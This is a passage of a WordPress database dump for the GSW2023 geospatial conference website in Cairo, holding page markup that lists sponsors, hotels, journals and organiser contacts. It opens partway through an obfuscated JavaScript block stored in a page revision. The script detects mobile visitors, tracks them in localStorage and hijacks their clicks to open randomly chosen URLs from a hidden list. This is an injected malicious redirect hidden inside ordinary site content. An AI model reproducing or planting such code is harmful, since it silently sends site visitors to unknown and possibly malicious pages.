function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 04:00:01','2023-08-13 04:00:01','',3066,'https://gsw2023.com/?p=5102',0,'revision','',0),
(5103,1,'2023-08-13 12:13:22','2023-08-13 12:13:22','<p style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the auspices of </strong></span>\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></p>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 105px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column 